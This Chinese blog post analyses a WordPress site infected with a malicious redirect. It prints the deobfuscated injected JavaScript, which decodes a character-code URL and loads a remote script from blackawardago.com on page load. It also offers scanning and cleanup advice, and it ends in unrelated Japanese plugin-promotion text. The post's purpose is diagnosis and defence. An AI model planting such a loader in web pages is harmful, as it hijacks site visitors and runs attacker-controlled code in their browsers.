昨天在群里看到有个站长在问WordPress
搭建的网站一打开就自动跳转到别人的网站是什么情况。然后奶爸访问他私聊的网址进去看了下。
WordPress感染恶意重定向代码
打开自己的网站,网站内容加载一大半后就会自动跳转到第三方的网站,并且会连续跳好几个网站。 同时跳转过去的网站会要求你给予它通知权限,如下图:
然后分析了下网站的源代码(装了好多插件,导致有好多js啊什么的代码,太乱了) 最终发现下面这串代码有些不正常,问了下站长,不是他自己的也不是他装的那些插件的。
然后奶爸就搜了下这个eval(String.fromCharCode,发现了下面这篇记录文章
记录 - 网站被 HACK!
然后通过
jdstiles.com这个网站解析了下上面那串代码的含义。
var d=document;var s=d.createElement('script');
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}再解析一次上面的数字,出来了下面这个网站
https://blackawardago.com
不用管最后出来的是什么网址,都知道这是网站被黑了。 国外对这个称之为WordPress恶意重定向代码,好像是18年开始流行起来的,下面是奶爸搜资料的时候看到的两篇文章。
https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net 如果你想知道下你网站是不是也中了这个恶意重定向代码,可以通过下面这个网站检查一下。
https://sitecheck.sucuri.net/WordPress恶意重定向代码清除方法
当然,如果中了WordPress恶意重定向代码如何清除呢?(因为那站长并没有让我帮忙处理,所以奶爸没有接触到实际代码,下面是分享的一般处理办法)
能看懂代码的解决办法- 找出恶意代码,删除。
- 排查网站所有文件跟代码,看是否还有感染的和不明脚本,删除。
- 检查数据库是否被感染,如果有,删除感染内容。
看不懂代码的解决办法- 花钱找一个看得懂代码的帮你清理,我看上面老外的是108刀/年起。
- 网站删了重装,确保使用安全的主题跟插件,确保数据库没有被感染,确保服务器安全。
如果看到本文的大佬知道怎么清理这种恶意代码的,或者有清理恶意代码经验的,欢迎留言指教。
最后推荐一款插件:
WordPressにFirewallをインストールしましょう!Wordfenceを試してみてください 相关知识:
セキュリティ対策を徹底し、WordPressサイトのハッキングを防ぐ
コメントは閉鎖されました
この記事のコメント機能は閉鎖されています。ご質問がある場合は、他の方法でお問い合わせください。